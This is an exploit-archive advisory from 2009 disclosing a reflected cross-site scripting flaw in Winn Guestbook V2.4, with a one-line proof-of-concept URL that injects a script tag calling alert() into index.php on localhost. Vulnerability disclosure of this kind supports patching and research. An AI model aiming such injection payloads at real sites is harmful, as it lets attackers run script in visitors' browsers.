id: 10395
date: 12/25/2009
title: Winn Guestbook V2.4, Winn.ws Cross Site Scripting Vulnerability
author: indoushka
cves: 

===============================================================
Winn Guestbook V2.4, Winn.ws Cross Site Scripting Vulnerability
===============================================================

========================================================================================                 
| # Title    : © Winn Guestbook V2.4, Winn.ws Cross Site Scripting Vulnerability       |
| # Author   : indoushka                                                               |
| # Script   :  © Winn Guestbook V2.4, Winn.ws                                         |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://127.0.0.1/Winn-Guestbook[php]/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>



#  0day.today [2023-03-24]  #